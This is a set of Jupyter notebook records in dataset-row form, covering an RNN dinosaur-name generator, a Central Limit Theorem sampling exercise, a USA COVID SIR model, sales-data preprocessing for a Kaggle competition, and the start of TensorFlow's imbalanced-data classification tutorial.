22.604827\n\nMeustognathiterhucoplithaloptha\nJigaadosaurus\nKurrodon\nMecaistheansaurus\nYuromelosaurus\nEiaeropeeton\nTroenathiteritaus\n\n\nIteration: 26000, Loss: 22.714486\n\nNhyxosaurus\nKola\nLvrosaurus\nNecalosaurus\nYurolonlus\nEjakosaurus\nTroindronykus\n\n\nIteration: 28000, Loss: 22.647640\n\nOnyxosaurus\nLoceahosaurus\nLustleonlonx\nOlabasicachudrakhurgawamosaurus\nYtrojianiisaurus\nEladon\nTromacimathoshargicitan\n\n\nIteration: 30000, Loss: 22.598485\n\nOryuton\nLocaaesaurus\nLustoendosaurus\nOlaahus\nYusaurus\nEhadopldarshuellus\nTroia\n\n\nIteration: 32000, Loss: 22.211861\n\nMeutronlapsaurus\nKracallthcaps\nLustrathus\nMacairugeanosaurus\nYusidoneraverataus\nEialosaurus\nTroimaniathonsaurus\n\n\nIteration: 34000, Loss: 22.447230\n\nOnyxipaledisons\nKiabaeropa\nLussiamang\nPacaeptabalsaurus\nXosalong\nEiacoteg\nTroia\n\n\n"
]
],
[
[
"** Expected Output**\n\n```Python\nj = 0 idx = 0\nsingle_example = turiasaurus\nsingle_example_chars ['t', 'u', 'r', 'i', 'a', 's', 'a', 'u', 'r', 'u', 's']\nsingle_example_ix [20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19]\n X = [None, 20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19] \n Y = [20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19, 0] \n\nIteration: 0, Loss: 23.087336\n\nNkzxwtdmfqoeyhsqwasjkjvu\nKneb\nKzxwtdmfqoeyhsqwasjkjvu\nNeb\nZxwtdmfqoeyhsqwasjkjvu\nEb\nXwtdmfqoeyhsqwasjkjvu\n\n\nj = 1535 idx = 1535\nj = 1536 idx = 0\nIteration: 2000, Loss: 27.884160\n\n...\n\nIteration: 34000, Loss: 22.447230\n\nOnyxipaledisons\nKiabaeropa\nLussiamang\nPacaeptabalsaurus\nXosalong\nEiacoteg\nTroia\n```",
"_____no_output_____"
],
[
"## Conclusion\n\nYou can see that your algorithm has started to generate plausible dinosaur names towards the end of the training. At first, it was generating random characters, but towards the end you could see dinosaur names with cool endings. Feel free to run the algorithm even longer and play with hyperparameters to see if you can get even better results. Our implementation generated some really cool names like `maconucon`, `marloralus` and `macingsersaurus`. Your model hopefully also learned that dinosaur names tend to end in `saurus`, `don`, `aura`, `tor`, etc.\n\nIf your model generates some non-cool names, don't blame the model entirely--not all actual dinosaur names sound cool. (For example, `dromaeosauroides` is an actual dinosaur name and is in the training set.) But this model should give you a set of candidates from which you can pick the coolest! \n\nThis assignment had used a relatively small dataset, so that you could train an RNN quickly on a CPU. Training a model of the english language requires a much bigger dataset, and usually needs much more computation, and could run for many hours on GPUs. We ran our dinosaur name for quite some time, and so far our favorite name is the great, undefeatable, and fierce: Mangosaurus!\n\n<img src=\"images/mangosaurus.jpeg\" style=\"width:250;height:300px;\">",
"_____no_output_____"
],
[
"## 4 - Writing like Shakespeare\n\nThe rest of this notebook is optional and is not graded, but we hope you'll do it anyway since it's quite fun and informative. \n\nA similar (but more complicated) task is to generate Shakespeare poems. Instead of learning from a dataset of Dinosaur names you can use a collection of Shakespearian poems. Using LSTM cells, you can learn longer term dependencies that span many characters in the text--e.g., where a character appearing somewhere a sequence can influence what should be a different character much much later in the sequence. These long term dependencies were less important with dinosaur names, since the names were quite short. \n\n\n<img src=\"images/shakespeare.jpg\" style=\"width:500;height:400px;\">\n<caption><center> Let's become poets! </center></caption>\n\nWe have implemented a Shakespeare poem generator with Keras. Run the following cell to load the required packages and models. This may take a few minutes. ",
"_____no_output_____"
]
],
[
[
"from __future__ import print_function\nfrom keras.callbacks import LambdaCallback\nfrom keras.models import Model, load_model, Sequential\nfrom keras.layers import Dense, Activation, Dropout, Input, Masking\nfrom keras.layers import LSTM\nfrom keras.utils.data_utils import get_file\nfrom keras.preprocessing.sequence import pad_sequences\nfrom shakespeare_utils import *\nimport sys\nimport io",
"Using TensorFlow backend.\n"
]
],
[
[
"To save you some time, we have already trained a model for ~1000 epochs on a collection of Shakespearian poems called [*\"The Sonnets\"*](shakespeare.txt). ",
"_____no_output_____"
],
[
"Let's train the model for one more epoch. When it finishes training for an epoch---this will also take a few minutes---you can run `generate_output`, which will prompt asking you for an input (`<`40 characters). The poem will start with your sentence, and our RNN-Shakespeare will complete the rest of the poem for you! For example, try \"Forsooth this maketh no sense \" (don't enter the quotation marks). Depending on whether you include the space at the end, your results might also differ--try it both ways, and try other inputs as well. \n",
"_____no_output_____"
]
],
[
[
"print_callback = LambdaCallback(on_epoch_end=on_epoch_end)\n\nmodel.fit(x, y, batch_size=128, epochs=1, callbacks=[print_callback])",
"Epoch 1/1\n 1408/31412 [>.............................] - ETA: 317s - loss: 3.5865"
],
[
"# Run this cell to try with different inputs without having to re-train the model \ngenerate_output()",
"_____no_output_____"
]
],
[
[
"The RNN-Shakespeare model is very similar to the one you have built for dinosaur names. The only major differences are:\n- LSTMs instead of the basic RNN to capture longer-range dependencies\n- The model is a deeper, stacked LSTM model (2 layer)\n- Using Keras instead of python to simplify the code \n\nIf you want to learn more, you can also check out the Keras Team's text generation implementation on GitHub: https://github.com/keras-team/keras/blob/master/examples/lstm_text_generation.py.\n\nCongratulations on finishing this notebook! ",
"_____no_output_____"
],
[
"**References**:\n- This exercise took inspiration from Andrej Karpathy's implementation: https://gist.github.com/karpathy/d4dee566867f8291f086. To learn more about text generation, also check out Karpathy's [blog post](http://karpathy.github.io/2015/05/21/rnn-effectiveness/).\n- For the Shakespearian poem generator, our implementation was based on the implementation of an LSTM text generator by the Keras team: https://github.com/keras-team/keras/blob/master/examples/lstm_text_generation.py ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb01e8bbd051e11d917990effd50bd35958b33f9 | 15,864 | ipynb | Jupyter Notebook | Part 3 Descriptive Statistics/Study materials/08-sampling-distributions/08_Sampling Distributions/Sampling Distributions - 19 - Central Limit Theorem - Part II.ipynb | bimarsha7/Data-analysis | a748a08aaef1c347021dffd3dea572e4b6c1bc39 | [
"MIT"
] | null | null | null | Part 3 Descriptive Statistics/Study materials/08-sampling-distributions/08_Sampling Distributions/Sampling Distributions - 19 - Central Limit Theorem - Part II.ipynb | bimarsha7/Data-analysis | a748a08aaef1c347021dffd3dea572e4b6c1bc39 | [
"MIT"
] | null | null | null | Part 3 Descriptive Statistics/Study materials/08-sampling-distributions/08_Sampling Distributions/Sampling Distributions - 19 - Central Limit Theorem - Part II.ipynb | bimarsha7/Data-analysis | a748a08aaef1c347021dffd3dea572e4b6c1bc39 | [
"MIT"
] | null | null | null | 139.157895 | 7,264 | 0.892083 | [
[
[
"### Central Limit Theorem - Part II\n\nWork through the questions and use the created variables to answer the questions that follow below the notebook.\n\nRun the below cell to get started.\n",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\n\n%matplotlib inline\nnp.random.seed(42)\n\npop_data = np.random.gamma(1,100,3000)\nplt.hist(pop_data);",
"_____no_output_____"
]
],
[
[
"`1.` In order to create the sampling distribution for the average of 100 draws of this distribution, follow these steps:\n\n`a.` Use numpy's **random.choice** to simulate 100 draws from the `pop_data` array. <br><br>\n`b.` Compute the mean of these 100 draws. <br><br>\n`c.` Write a loop to simulate this process 10,000 times, and store each mean into an array called **means_size_100**.<br><br>\n`d.` Plot a histogram of your sample means.<br><br>\n`e.` Use **means_size_100** and **pop_data** to answer the quiz questions below.",
"_____no_output_____"
]
],
[
[
"means_size_100 = []\nfor _ in range(10000):\n sample = np.random.choice(pop_data, 100)\n means_size_100.append(sample.mean())\n \nplt.hist(means_size_100);",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb01eb520b80314c4a8fdd3595d84de4735435d4 | 730 | ipynb | Jupyter Notebook | 2020 Осенний семестр/Практическое задание 1/Петров_Задание_1.ipynb | mosalov/Notebook_For_AI_Main | a693d29bf0bdcf824cb4f1eca86ff54b67ba7428 | [
"MIT"
] | 6 | 2021-09-20T10:28:18.000Z | 2022-03-14T18:39:17.000Z | 2020 Осенний семестр/Практическое задание 1/Петров_Задание_1.ipynb | mosalov/Notebook_For_AI_Main | a693d29bf0bdcf824cb4f1eca86ff54b67ba7428 | [
"MIT"
] | 122 | 2020-09-07T11:57:57.000Z | 2022-03-22T06:47:03.000Z | 2020 Осенний семестр/Практическое задание 1/Петров_Задание_1.ipynb | mosalov/Notebook_For_AI_Main | a693d29bf0bdcf824cb4f1eca86ff54b67ba7428 | [
"MIT"
] | 97 | 2020-09-07T11:32:19.000Z | 2022-03-31T10:27:38.000Z | 365 | 729 | 0.689041 | [
[
[
"first_name, last_name = 'Максим','Петров'\nfull_name = first_name+' '+last_name\n\nprint(full_name, len(full_name), sep='\\n')",
"Максим Петров\n13\n"
]
]
] | [
"code"
] | [
[
"code"
]
] |
cb01f703017277b8ab284ab4b2478414726e5896 | 4,883 | ipynb | Jupyter Notebook | SIR Models for Testing Section in MSc Report/USA SIR Model - MSc Project (CMM513).ipynb | aodare90/epidemic_modelling | 6be5eeeccf38e69e45717dfca18bc45cb32e1753 | [
"CC0-1.0"
] | null | null | null | SIR Models for Testing Section in MSc Report/USA SIR Model - MSc Project (CMM513).ipynb | aodare90/epidemic_modelling | 6be5eeeccf38e69e45717dfca18bc45cb32e1753 | [
"CC0-1.0"
] | null | null | null | SIR Models for Testing Section in MSc Report/USA SIR Model - MSc Project (CMM513).ipynb | aodare90/epidemic_modelling | 6be5eeeccf38e69e45717dfca18bc45cb32e1753 | [
"CC0-1.0"
] | null | null | null | 46.504762 | 782 | 0.637313 | [
[
[
"# Adapated from https://scipython.com/book/chapter-8-scipy/additional-examples/the-sir-epidemic-model/ - Courtesy of SciPy\n# Slider from -> https://matplotlib.org/3.1.1/gallery/widgets/slider_demo.html - Courtesty of Matplotlib\n# UK COVID Data -> https://ourworldindata.org/coronavirus/country/united-kingdom?country=~GBR (OWID)\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt, mpld3\nfrom ipywidgets import interactive\n\ncases = pd.read_csv('owid-covid-data.csv')\ncases = cases[cases['iso_code']=='USA']\ncases.drop(['life_expectancy','hospital_beds_per_thousand','handwashing_facilities','male_smokers','female_smokers','diabetes_prevalence','cardiovasc_death_rate','extreme_poverty','gdp_per_capita','aged_70_older', 'aged_65_older','median_age','population_density','population','stringency_index','tests_units','positive_rate','tests_per_case','new_tests_smoothed_per_thousand','new_tests_smoothed','new_tests_per_thousand','total_tests_per_thousand','total_tests','new_tests','new_deaths_per_million','total_deaths_per_million','new_cases_per_million','total_cases_per_million','new_deaths','total_deaths','new_cases','continent','location','new_deaths_smoothed_per_million','new_cases_smoothed_per_million','new_deaths_smoothed','new_cases_smoothed'],axis=1, inplace=True)\ncases = cases[cases['date']=='2020-08-20']\n\npop = pd.read_csv('owid-covid-data.csv')\npop = pop[pop['iso_code']=='USA']\npop.drop(['life_expectancy','hospital_beds_per_thousand','handwashing_facilities','male_smokers','female_smokers','diabetes_prevalence','cardiovasc_death_rate','extreme_poverty','gdp_per_capita','aged_70_older', 'aged_65_older','median_age','population_density','stringency_index','tests_units','positive_rate','tests_per_case','new_tests_smoothed_per_thousand','new_tests_smoothed','new_tests_per_thousand','total_tests_per_thousand','total_tests','new_tests','new_deaths_per_million','total_deaths_per_million','new_cases_per_million','total_cases_per_million','new_deaths','total_deaths','new_cases','continent','location','total_cases', 'new_cases_smoothed','new_deaths_smoothed','new_cases_smoothed_per_million','new_deaths_smoothed_per_million'],axis=1, inplace=True)\npop = pop[pop['date']=='2020-08-20']\n\nN = pop['population']\nI0, R0 = cases['total_cases'], 0\nS0 = N - I0 - R0\nbeta, gamma = 0, 0\nt = np.linspace(0, 60, 60)\n\n# The SIR model differential equations.\ndef sir(y, t, N, beta, gamma):\n S, I, R = y\n dSdt = -beta * S * I / N\n dIdt = beta * S * I / N - gamma * I\n dRdt = gamma * I\n return dSdt, dIdt, dRdt\n\n# Initial conditions vector\ny0 = S0, I0, R0\n\n# Plot the data on three separate curves for S(t), I(t) and R(t)\ndef sir_interactive_func(beta, gamma):\n ret = odeint(sir, y0, t, args=(N, beta, gamma))\n S, I, R = ret.T\n \n fig = plt.figure()\n ax = fig.add_subplot(111, axisbelow=True)\n ax.plot(t, S/1000, 'yellow', lw=1.5, label='Susceptible')\n ax.plot(t, I/1000, 'red', lw=1.5, label='Infected')\n ax.plot(t, R/1000, 'blue', lw=1.5, label='Recovered')\n ax.set_xlabel('Time (days)')\n ax.set_ylabel('Population (1000s)')\n ax.grid(b=True, which='major', c='#bbbbbb', lw=1, ls='-')\n legend = ax.legend()\n legend.get_frame().set_alpha(0.5)\n #mpld3.save_html(fig, 'usa.html')\n\ninteractive_plot = interactive(sir_interactive_func, beta=(0.10,2,0.01), gamma=(0.10,1,0.01))\ninteractive_plot",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code"
]
] |
cb01ff2d32a3ea34d32751ff22cceac57a3dca83 | 274,976 | ipynb | Jupyter Notebook | Data Preprocessing.ipynb | RohithYogi/Predict-Future-Sales | 86437d951053d3c22d65c580dfc890e9945a2ec1 | [
"MIT"
] | null | null | null | Data Preprocessing.ipynb | RohithYogi/Predict-Future-Sales | 86437d951053d3c22d65c580dfc890e9945a2ec1 | [
"MIT"
] | null | null | null | Data Preprocessing.ipynb | RohithYogi/Predict-Future-Sales | 86437d951053d3c22d65c580dfc890e9945a2ec1 | [
"MIT"
] | 1 | 2019-04-12T06:38:17.000Z | 2019-04-12T06:38:17.000Z | 175.367347 | 101,220 | 0.878491 | [
[
[
"import numpy as np\nimport pandas as pd \nimport os\nprint(os.listdir(\"../input\"))",
"['sample_submission.csv', 'test.csv', 'README.md', 'train.csv', 'items.csv', 'shops.csv', 'item_categories.csv']\n"
],
[
"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport numpy.random as nr\nimport math\n\n%matplotlib inline\ndata = pd.read_csv('../input/train.csv')\nprint(data.head(3))\ndata.info()",
" date date_block_num shop_id item_id item_price item_cnt_day \\\n0 28.12.2014 23 25 12179 959.000000 1.0 \n1 23.04.2014 15 25 14042 149.000000 1.0 \n2 03.03.2014 14 12 11373 106.615385 13.0 \n\n ID \n0 2317582 \n1 1576962 \n2 1547382 \n<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 2925849 entries, 0 to 2925848\nData columns (total 7 columns):\ndate object\ndate_block_num int64\nshop_id int64\nitem_id int64\nitem_price float64\nitem_cnt_day float64\nID int64\ndtypes: float64(2), int64(4), object(1)\nmemory usage: 156.3+ MB\n"
],
[
"# Check for negative item_cnt_day \ndata[data['item_cnt_day']<0]['item_cnt_day'].value_counts()",
"_____no_output_____"
],
[
"plt.plot(data[data['item_cnt_day']<0]['item_id'].value_counts().sort_index())",
"_____no_output_____"
],
[
"data_filtered=data.loc[data['item_cnt_day']>0]\ndata_filtered.info()\ndata=data_filtered",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 2918525 entries, 0 to 2925848\nData columns (total 7 columns):\ndate object\ndate_block_num int64\nshop_id int64\nitem_id int64\nitem_price float64\nitem_cnt_day float64\nID int64\ndtypes: float64(2), int64(4), object(1)\nmemory usage: 178.1+ MB\n"
],
[
"item_categories = pd.read_csv('../input/items.csv')\nitem_categories.head(3)",
"_____no_output_____"
],
[
"dt=pd.merge(data, item_categories, how='inner')\ndt.sort_values(by=['date'], inplace=True)\ndt.head(3)",
"_____no_output_____"
],
[
"## Drop column which is unused\ncolumns=['date','item_price','item_name']\nfor c in columns:\n if c in dt:\n dt.drop(c, axis = 1, inplace = True)\ndt[(dt['item_cnt_day']>0)].head(3)",
"_____no_output_____"
],
[
"\n#Group by 'date_block_num', 'shop_id','item_id' and \n#sum the item count per day to get the sum for each month (or date_block_num)\n\ndtf=dt.groupby(['date_block_num', 'shop_id','item_id'])[[\"item_cnt_day\"]].sum().reset_index()",
"_____no_output_____"
],
[
"print(data.size)\nprint(dtf.size)",
"20429675\n6418680\n"
],
[
"dtf.hist(figsize=(15,20))\nplt.figure()",
"_____no_output_____"
],
[
"pd.plotting.scatter_matrix(dtf[['item_cnt_day','item_id','shop_id','date_block_num']],figsize=(10,10))\nplt.figure()",
"_____no_output_____"
],
[
"dtf[(dtf['item_id']==2929) & (dtf['shop_id']==0)]",
"_____no_output_____"
],
[
"dt[(dt['item_id']==2929) & (dt['shop_id']==0)]",
"_____no_output_____"
],
[
"test_shop_id=dt.groupby(['shop_id'])[[\"item_cnt_day\"]].sum().reset_index()\ntest_shop_id.head()\nplt.bar(test_shop_id['shop_id'],test_shop_id [\"item_cnt_day\"])",
"_____no_output_____"
],
[
"\n#Analyze item_id outliers\n\ntest_item_id=dt.groupby(['item_id'])[[\"item_cnt_day\"]].sum().reset_index()\nplt.plot(test_item_id[(test_item_id['item_id']!=20949)]['item_id'],test_item_id[(test_item_id['item_id']!=20949)] [\"item_cnt_day\"])\nplt.plot(test_item_id[(test_item_id['item_cnt_day']<=10000)]['item_id'],test_item_id[(test_item_id['item_cnt_day']<=10000)][\"item_cnt_day\"])\n\nprint(test_item_id[(test_item_id['item_id']!=20949)]['item_id'].describe())\nprint(test_item_id[(test_item_id['item_cnt_day']>12000)]['item_id'].value_counts())\n\n",
"count 21794.000000\nmean 11098.519317\nstd 6396.860317\nmin 0.000000\n25% 5551.250000\n50% 11104.500000\n75% 16646.750000\nmax 22169.000000\nName: item_id, dtype: float64\n5822 1\n17717 1\n3732 1\n20949 1\n2808 1\nName: item_id, dtype: int64\n"
],
[
"test_item_id=dt.groupby(['item_category_id'])[[\"item_cnt_day\"]].sum().reset_index()\nplt.plot(test_item_id['item_category_id'],test_item_id[\"item_cnt_day\"])",
"_____no_output_____"
],
[
"\n#Try to remove outliers (december months)\n\nplt.plot(dt.groupby(['date_block_num'])[[\"item_cnt_day\"]].sum())\ndt_filtered=dt.loc[(dt['date_block_num'] ==9) | (dt['date_block_num'] ==10) | (dt['date_block_num'] ==21)| (dt['date_block_num'] ==22) | (dt['date_block_num'] ==33)]\nprint(dt_filtered.size)\n\n",
"2446908\n"
],
[
"dt_filtered['date_block_num'].value_counts()",
"_____no_output_____"
],
[
"pd.options.mode.chained_assignment = None # default='warn'\n\nidx=dt_filtered.loc[(dt_filtered['date_block_num'] ==9)].index.values\ndt_filtered.at[idx,'date_block_num']=0\ndt_filtered.at[idx,'year']=1\n\nidx=dt_filtered.loc[(dt_filtered['date_block_num'] ==10)].index.values\ndt_filtered.at[idx,'date_block_num']=1\ndt_filtered.at[idx,'year']=1\n\nidx=dt_filtered.loc[(dt_filtered['date_block_num'] ==21)].index.values\ndt_filtered.at[idx,'date_block_num']=0\ndt_filtered.at[idx,'year']=2\n\nidx=dt_filtered.loc[(dt_filtered['date_block_num'] ==22)].index.values\ndt_filtered.at[idx,'date_block_num']=1\ndt_filtered.at[idx,'year']=2\n\nidx=dt_filtered.loc[(dt_filtered['date_block_num'] ==33)].index.values\ndt_filtered.at[idx,'date_block_num']=0\ndt_filtered.at[idx,'year']=3\nprint(dt_filtered['date_block_num'].value_counts())\nprint(dt_filtered['year'].value_counts())",
"0 225702\n1 182116\nName: date_block_num, dtype: int64\n1.0 189785\n2.0 164836\n3.0 53197\nName: year, dtype: int64\n"
],
[
"plt.plot(dt_filtered.groupby(['date_block_num'])[[\"item_cnt_day\"]].sum())\nprint(dt_filtered.head())",
" date_block_num shop_id item_id item_cnt_day ID \\\n1088328 0 55 2381 1.0 957288 \n168366 0 31 7071 1.0 948033 \n783252 0 19 3183 1.0 1000847 \n2215571 0 57 21566 1.0 992975 \n109330 0 30 21377 1.0 964044 \n\n item_category_id year \n1088328 31 1.0 \n168366 19 1.0 \n783252 30 1.0 \n2215571 40 1.0 \n109330 40 1.0 \n"
],
[
"dt_filtered.to_csv('sales_train_trans_filtered.csv', sep=',',index=False)",
"_____no_output_____"
],
[
"dt.to_csv('sales_train_trans.csv', sep=',',index=False)",
"_____no_output_____"
],
[
"\n#Prepare test data : adding category column\n\nsales_test = pd.read_csv('../input/test.csv')\nsales_test.head(3)\n\n",
"_____no_output_____"
],
[
"sales_test1=pd.merge(sales_test, item_categories, how='inner')\nsales_test1.sort_values(by=['ID'], inplace=True)\nsales_test1.head(3)",
"_____no_output_____"
],
[
"sales_test1['shop_id'].value_counts()",
"_____no_output_____"
],
[
"sales_test1.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 10000 entries, 3034 to 252\nData columns (total 8 columns):\ndate 10000 non-null object\ndate_block_num 10000 non-null int64\nshop_id 10000 non-null int64\nitem_id 10000 non-null int64\nitem_price 10000 non-null float64\nID 10000 non-null int64\nitem_name 10000 non-null object\nitem_category_id 10000 non-null int64\ndtypes: float64(1), int64(5), object(2)\nmemory usage: 703.1+ KB\n"
],
[
"sales_test1.isnull().sum()",
"_____no_output_____"
],
[
"sales_test1['item_id'].value_counts().count()",
"_____no_output_____"
],
[
"sales_test1['item_category_id'].value_counts().count()",
"_____no_output_____"
],
[
"dt['item_category_id'].value_counts().count()",
"_____no_output_____"
],
[
"\n##Item_category_id that can be removed\n\n#pd.concat([pd.unique(sales_test1['item_category_id']),pd.unique(sales_test1['item_category_id'])]).drop_duplicates(keep=False)\n#print(\"sales_test1['item_category_id']-->\",pd.unique(sales_test1['item_category_id']))\n#print(\"dt['item_category_id']-->\",pd.unique(dt['item_category_id']))\n#print(\"concatenate-->\", np.concatenate((pd.unique(sales_test1['item_category_id']),pd.unique(dt['item_category_id'])),axis=0))\nnp.unique(np.concatenate((pd.unique(sales_test1['item_category_id']),pd.unique(dt['item_category_id'])),axis=0))\n\na=set(pd.unique(dt['item_category_id']));\nb=set(pd.unique(sales_test1['item_category_id']));\n\nlist(a-b)\n\n",
"_____no_output_____"
],
[
"sales_test1.drop('item_name', axis = 1, inplace = True)\nsales_test1.to_csv('sales_test1.csv', sep=',',index=False)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb021f64bfb273e74c3b24e1e056356da19c24b5 | 57,494 | ipynb | Jupyter Notebook | site/en/tutorials/structured_data/imbalanced_data.ipynb | arshPratap/docs | b6c5c4e272a2be7aab27573d747f4c3edcc5d4b8 | [
"Apache-2.0"
] | 1 | 2020-02-14T04:02:02.000Z | 2020-02-14T04:02:02.000Z | site/en/tutorials/structured_data/imbalanced_data.ipynb | arshPratap/docs | b6c5c4e272a2be7aab27573d747f4c3edcc5d4b8 | [
"Apache-2.0"
] | 32 | 2020-07-23T21:36:02.000Z | 2020-09-11T05:46:09.000Z | site/en/tutorials/structured_data/imbalanced_data.ipynb | arshPratap/docs | b6c5c4e272a2be7aab27573d747f4c3edcc5d4b8 | [
"Apache-2.0"
] | 2 | 2020-05-14T12:53:13.000Z | 2020-07-30T20:12:17.000Z | 34.427545 | 741 | 0.548927 | [
[
[
"#### Copyright 2019 The TensorFlow Authors.",
"_____no_output_____"
]
],
[
[
"#@title Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.",
"_____no_output_____"
]
],
[
[
"# Classification on imbalanced data",
"_____no_output_____"
],
[
"<table class=\"tfo-notebook-buttons\" align=\"left\">\n <td>\n <a target=\"_blank\" href=\"https://www.tensorflow.org/tutorials/structured_data/imbalanced_data\"><img src=\"https://www.tensorflow.org/images/tf_logo_32px.png\" />View on TensorFlow.org</a>\n </td>\n <td>\n <a target=\"_blank\" href=\"https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/structured_data/imbalanced_data.ipynb\"><img src=\"https://www.tensorflow.org/images/colab_logo_32px.png\" />Run in Google Colab</a>\n </td>\n <td>\n <a target=\"_blank\" href=\"https://github.com/tensorflow/docs/blob/master/site/en/tutorials/structured_data/imbalanced_data.ipynb\"><img src=\"https://www.tensorflow.org/images/GitHub-Mark-32px.png\" />View source on GitHub</a>\n </td>\n <td>\n <a href=\"https://storage.googleapis.com/tensorflow_docs/docs/site/en/tutorials/structured_data/imbalanced_data.ipynb\"><img src=\"https://www.tensorflow.org/images/download_logo_32px.png\" />Download notebook</a>\n </td>\n</table>",
"_____no_output_____"
],
[
"This tutorial demonstrates how to classify a highly imbalanced dataset in which the number of examples in one class greatly outnumbers the examples in another. You will work with the [Credit Card Fraud Detection](https://www.kaggle.com/mlg-ulb/creditcardfraud) dataset hosted on Kaggle. The aim is to detect a mere 492 fraudulent transactions from 284,807 transactions in total. You will use [Keras](https://www.tensorflow.org/guide/keras/overview) to define the model and [class weights](https://www.tensorflow.org/versions/r2.0/api_docs/python/tf/keras/Model) to help the model learn from the imbalanced data. .\n\nThis tutorial contains complete code to:\n\n* Load a CSV file using Pandas.\n* Create train, validation, and test sets.\n* Define and train a model using Keras (including setting class weights).\n* Evaluate the model using various metrics (including precision and recall).\n* Try common techniques for dealing with imbalanced data like:\n * Class weighting \n * Oversampling\n",
"_____no_output_____"
],
[
"## Setup",
"_____no_output_____"
]
],
[
[
"import tensorflow as tf\nfrom tensorflow import keras\n\nimport os\nimport tempfile\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nimport sklearn\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler",
"_____no_output_____"
],
[
"mpl.rcParams['figure.figsize'] = (12, 10)\ncolors = plt.rcParams['axes.prop_cycle'].by_key()['color']",
"_____no_output_____"
]
],
[
[
"## Data processing and exploration",
"_____no_output_____"
],
[
"### Download the Kaggle Credit Card Fraud data set\n\nPandas is a Python library with many helpful utilities for loading and working with structured data. It can be used to download CSVs into a Pandas [DataFrame](https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.html#pandas.DataFrame).\n\nNote: This dataset has been collected and analysed during a research collaboration of Worldline and the [Machine Learning Group](http://mlg.ulb.ac.be) of ULB (Université Libre de Bruxelles) on big data mining and fraud detection. More details on current and past projects on related topics are available [here](https://www.researchgate.net/project/Fraud-detection-5) and the page of the [DefeatFraud](https://mlg.ulb.ac.be/wordpress/portfolio_page/defeatfraud-assessment-and-validation-of-deep-feature-engineering-and-learning-solutions-for-fraud-detection/) project",
"_____no_output_____"
]
],
[
[
"file = tf.keras.utils\nraw_df = pd.read_csv('https://storage.googleapis.com/download.tensorflow.org/data/creditcard.csv')\nraw_df.head()",
"_____no_output_____"
],
[
"raw_df[['Time', 'V1', 'V2', 'V3', 'V4', 'V5', 'V26', 'V27', 'V28', 'Amount', 'Class']].describe()",
"_____no_output_____"
]
],
[
[
"### Examine the class label imbalance\n\nLet's look at the dataset imbalance:",
"_____no_output_____"
]
],
[
[
"neg, pos = np.bincount(raw_df['Class'])\ntotal = neg + pos\nprint('Examples:\\n Total: {}\\n Positive: {} ({:.2f}% of total)\\n'.format(\n total, pos, 100 * pos / total))",
"_____no_output_____"
]
],
[
[
"This shows the small fraction of positive samples.",
"_____no_output_____"
],
[
"### Clean, split and normalize the data\n\nThe raw data has a few issues. First the `Time` and `Amount` columns are too variable to use directly. Drop the `Time` column (since it's not clear what it means) and take the log of the `Amount` column to reduce its range.",
"_____no_output_____"
]
],
[
[
"cleaned_df = raw_df.copy()\n\n# You don't want the `Time` column.\ncleaned_df.pop('Time')\n\n# The `Amount` column covers a huge range. Convert to log-space.\neps = 0.001 # 0 => 0.1¢\ncleaned_df['Log Ammount'] = np.log(cleaned_df.pop('Amount')+eps)",
"_____no_output_____"
]
],
[
[
"Split the dataset into train, validation, and test sets. The validation set is used during the model fitting to evaluate the loss and any metrics, however the model is not fit with this data. The test set is completely unused during the training phase and is only used at the end to evaluate how well the model generalizes to new data. This is especially important with imbalanced datasets where [overfitting](https://developers.google.com/machine-learning/crash-course/generalization/peril-of-overfitting) is a significant concern from the lack of training data.",
"_____no_output_____"
]
],
[
[
